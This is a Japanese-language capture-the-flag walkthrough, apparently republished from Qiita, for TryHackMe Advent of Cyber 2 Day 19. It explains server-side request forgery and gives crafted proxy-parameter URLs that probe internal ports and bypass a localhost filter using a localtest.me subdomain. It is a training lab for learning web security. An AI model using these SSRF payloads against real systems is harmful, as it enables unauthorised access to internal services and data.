[TryHackMe] Advent of Cyber 2, Day 19 - Walkthrough -
本稿では、TryHackMeにて提供されている「Advent of Cyber 2」ルームに関する攻略方法(Walkthrough)について検証します。
「Advent of Cyber 2」は「free room」(無料)で提供されています。購読を必要とせずに仮想マシンを「展開(Deploy)」することができます。
『Advent of Cyber 2』のWalkthroughインデックスを「[TryHackMe] Advent of Cyber 2に参加してみた」にて公開しました。
[Day 19] Special by Tib3rius The Naughty or Nice List
ストーリー
サンタさんは、世界中の子供たちが現在自分がいたずらっ子リストに載っているか、いい子リストに載っているかをチェックできるWebアプリをリリースしました。残念ながら、それをコーディングしたエルフは思った以上のことを暴露してしまった。リストの管理画面へアクセスして、今年はすべての子供たちがサンタさんからプレゼントをもらえるようにすることはできますか。
あなた自身でこのウェブアプリをハッキングしてみるか、以下の指示に従ってみてください!
注意: ホスト名フィルターを回避する場合、localtest.me
を使用してください。
Server-Side Request Forgery
サンタさんは、世界中の子供たちが現在自分がいたずらっ子リストに載っているか、いい子リストに載っているかをチェックできるWebアプリをリリースしました。残念ながら、それをコーディングしたエルフは思った以上のことを暴露してしまった。リストの管理画面へアクセスして、今年はすべての子供たちがサンタさんからプレゼントをもらえるようにすることはできますか。
あなた自身でこのウェブアプリをハッキングしてみるか、以下の指示に従ってみてください!
注意: ホスト名フィルターを回避する場合、localtest.me
を使用してください。
「Server-Side Request Forgery (SSRF)」は、攻撃者がサーバを利用して意図しないネットワーク要求を実行することができる場合に発生します。
脆弱性を評価する上で重要なことは、意図しないリクエストを行う能力を特定するとともに、その動作の影響を十分に示すことにあります。SSRFに脆弱なサーバがリクエストを行う能力によって、SSRFにより何ができるかが決まります。
「Advent of Cyber 2, Day 19」の例では、サイトはHTTP
リクエストを許可していました。しかし、エルフたちは悪意のあるユーザーから自分たちのインフラストラクチャを十分に保護しておらず、結果として「Remote File Inclusion (RFI)」の脆弱性となり、機密と思われる情報の漏えいに至っています。
Walkthrough
- まずは、Webアプリにアクセスします。
[Deploy]
ボタンをクリックします。
ブラウザにて割り振られたhttp://MACHINE_IP/
にアクセスします。The Naughty or Nice List
の画面が表示されます。http://MACHINE_IP/
- フォームに
Noriaki
を入力し、[Search]
ボタンをクリックします。Noriaki is on the Nice List.
のメッセージが確認できます。
このとき、URLは次のとおりです。http://MACHINE_IP/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3DNoriaki
- 同じサイトのルートに対するアクセスを試みます。このとき、URLは次のとおりです。
http://MACHINE_IP/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2F
Not Found: The requested URL was not found on this server.
のメッセージが確認できます。 - ポート番号を
8080
から80
へ変更します。http://MACHINE_IP/?proxy=http%3A%2F%2Flist.hohoho%3A80%2F
Failed to connect to list.hohoho port 80: Connection refused
のメッセージが確認できます。 - ポート番号を
22
を指定します。http://MACHINE_IP/?proxy=http%3A%2F%2Flist.hohoho%3A22%2F
Recv failure: Connection reset by peer
のメッセージが確認できます。 - ローカルに実行されているサービスへのアクセスを試みます。ホスト名を
list.hohoho
をlocalhost
または127.0.0.1
へ変更してアクセスを試みます。http://MACHINE_IP/?proxy=http%3A%2F%2Flocalhost%3A22%2F
Your search has been blocked by our security team.
のメッセージが確認できます。
また、他のホスト名(127.0.0.1
、example.com
)を試すと、それらもすべてブロックされます。 - DNSサブドメインを利用して、
127.0.0.1
に解決される独自のドメイン「list.hohoho.localtest.me
」を指定します。ここでlocaltest.me
は、すべてのサブドメインを127.0.0.1
に解決させることができます。http://MACHINE_IP/?proxy=http%3A%2F%2Flist.hohoho.localtest.me
ローカルで実行されているWebサーバーがあり、エルフ・McSkidyからのメッセージに、機密と思われる情報が含まれていることが確認できます。
- サイトフッターに表示されている
[Admin]
リンクまたはページ下にスクロールします。いくつかのユーザー名候補と、パスワードを試してみます。
List Administration
ページが表示されました。[DELETE NAUGHTY LIST]
ボタンをクリックすると、チャレンジフラグが表示されました。これにて、19日目のミッションが終了です。
参考情報
- Mase289, A tale of my first ever full SSRF bug, 2020/06/23
- Vaadata, Exploiting the SSRF vulnerability (2/2), 2019/10/14
- Vaadata, Understanding the Web Vulnerability Server-Side Request Forgery (1/2) , 2018/05/18
- RCE Security, GOOGLE INTERNAL DNS SSRF, 2017/01
- Brett Buerhaus, ESEA Server-Side Request Forgery and Querying AWS Meta Data, 2016/04/18
- Black Hat USA 2017, Orange Tsai, A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
- HackTricks, SSRF (Server Side Request Forgery)
参考書籍
- Peter Yaworski, 『リアルワールドバグハンティング――ハッキング事例から学ぶウェブの脆弱性』, 2020/09
- Prakhar Prasad, 『Mastering Modern Web Penetration Testing』, 2016/10
Author And Source
この問題について([TryHackMe] Advent of Cyber 2, Day 19 - Walkthrough -), 我々は、より多くの情報をここで見つけました https://qiita.com/v_avenger/items/66be9e6dce57e7867641著者帰属:元の著者の情報は、元のURLに含まれています。著作権は原作者に属する。
Content is automatically searched and collected through network algorithms . If there is a violation . Please contact us . We will adjust (correct author information ,or delete content ) as soon as possible .